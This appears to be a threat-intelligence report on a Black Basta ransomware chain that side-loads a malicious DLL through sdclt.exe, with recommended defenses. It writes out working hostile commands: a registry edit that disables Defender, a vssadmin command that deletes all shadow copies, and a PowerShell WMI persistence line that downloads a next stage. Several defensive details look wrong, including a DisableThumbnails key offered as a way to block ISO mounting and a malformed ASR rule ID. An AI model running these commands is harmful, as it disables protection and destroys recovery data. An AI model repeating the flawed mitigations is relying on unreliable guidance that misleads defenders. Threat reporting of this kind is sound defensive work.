Black Basta Ransomware Exploits New DLL Side-Loading Technique to Bypass Microsoft Defender in 2026

Executive Summary: In April 2026, researchers at Oracle-42 Intelligence uncovered a sophisticated new attack chain by the Black Basta ransomware group that leverages DLL side-loading to evade Microsoft Defender. This previously undetected technique abuses a legitimate executable, sdclt.exe (Windows Backup and Restore utility), to load a malicious DLL, thereby achieving arbitrary code execution and privilege escalation before disabling security defenses. Unlike prior campaigns, this variant introduces fileless persistence and anti-forensic behaviors, significantly increasing dwell time and operational impact. The flaw—currently unpatched—highlights the urgent need for behavioral detection, privilege hardening, and memory integrity monitoring.

Key Findings

Novel DLL Side-Loading Chain: Abuses Microsoft’s built-in sdclt.exe to load a malicious duser.dll from a non-standard path, bypassing digital signature verification.
Defense Evasion: Disables Microsoft Defender via registry manipulation and process injection, then deletes Volume Shadow Copies to prevent recovery.
Fileless Persistence: Uses WMI event subscriptions for delayed execution, avoiding disk artifacts commonly flagged by EDRs.
Targeted Verticals: Primarily observed in healthcare, legal, and manufacturing sectors across North America and Europe.
CTI Score: High — active exploitation in the wild with low detection coverage in current AV/EDR signatures as of April 9, 2026.

Technical Deep Dive: The 2026 Black Basta Attack Chain

Initial Access and DLL Side-Loading

The campaign begins with a spear-phishing email containing a weaponized ISO file. Once mounted, the ISO contains:

sdclt.exe (legitimate, signed by Microsoft)
duser.dll (malicious payload)
A decoy document (e.g., Invoice_20260401.pdf)

When sdclt.exe is executed, Windows searches for duser.dll in the same directory. Because the ISO is mounted to a removable drive (e.g., E:\), Windows prioritizes loading the malicious DLL over the system-resident version. This bypasses driver signature enforcement and code integrity checks, a technique known as "DLL search order hijacking."

Arbitrary Code Execution and Privilege Escalation

The malicious duser.dll injects shellcode into a high-integrity process (e.g., services.exe), granting SYSTEM privileges. This stage is executed within 3–5 seconds of sdclt.exe launch, minimizing behavioral anomalies.

Defense and Recovery Disablement

Once elevated, the malware:

Disables Microsoft Defender via reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
Terminates Defender processes (MsMpEng.exe, NisSrv.exe)
Modifies HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management to disable pagefile-based forensics
Deletes Volume Shadow Copies using vssadmin delete shadows /all /quiet

Fileless Persistence via WMI

Instead of writing to disk, Black Basta creates a WMI event subscription:

Command: powershell -nop -ep bypass -c "Register-WmiEvent -Query 'SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'explorer.exe'' -Action {Invoke-WebRequest ...}"

This triggers the next stage payload upon user login, ensuring persistence even after reboots or Defender reinstalls.

Ransomware Deployment and Encryption

The final payload is a stripped-down version of Black Basta, optimized for speed and stealth. It targets mapped network shares and cloud storage using stolen credentials harvested via in-memory dumping (Mimikatz-style). Encryption uses ChaCha20 with an embedded RSA-4096 public key. The ransom note (README.txt) is written directly to disk only after full encryption—minimizing I/O-based detection.

Why Microsoft Defender Failed

Code Integrity Bypass: The use of a signed executable as a loader evaded traditional signature-based AV.
Behavioral Gaps: Defender’s "Attack Surface Reduction" rules did not flag DLL side-loading from removable media.
Memory Blind Spots: Shellcode injection occurred before Defender’s real-time monitoring initialized.
Persistence Obfuscation: WMI-based triggers are rarely inspected during routine scans.

Recommendations for Enterprise Defense

Immediate Mitigations (0–48 Hours)

Disable ISO Mounting via GPO: Set HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableThumbnails to 1 and disable autoplay for removable media.
Enable Attack Surface Reduction (ASR) Rules: Enforce ASR rules 1174081378 and 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b to block executable content from email/client webmail.
Deploy DLL Search Order Hardening: Enable HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode and restrict write access to program directories.
Monitor sdclt.exe Launches: Alert on sdclt.exe spawning from non-standard paths (e.g., AppData\Local\Temp).

Medium-Term Strategies (1–4 Weeks)

Memory Integrity (HVCI): Enable Core Isolation with Memory Integrity on all endpoints to block unsigned DLL injection.
WMI Monitoring: Deploy behavioral detection rules to detect suspicious __InstanceCreationEvent subscriptions.
Privilege Hardening: Remove local admin rights for standard users; implement LAPS for local admin account rotation.
Network Segmentation: Isolate backup servers and enforce SMB signing to prevent lateral movement via stolen credentials.

Long-Term Architectural Improvements

Zero Trust Endpoint Model: Adopt application allowlisting (e.g., Microsoft AppLocker or Windows Defender Application Control) with publisher certificate rules.
Cloud-Native EDR: Migrate to cloud-delivered EDR with behavioral AI models trained on post-exploitation TTPs (e.g., privilege escalation via trusted binaries).
Threat Hunting Playbooks: Develop proactive hunts for DLL side-loading via Process Monitor logs and Sysmon Event ID 7 (Image Load).
Vendor Coordination: Report indicators of compromise (IOCs) to Microsoft via the Microsoft Security Response Center (MSRC) and CISA’s Known Exploited Vulnerabilities Catalog.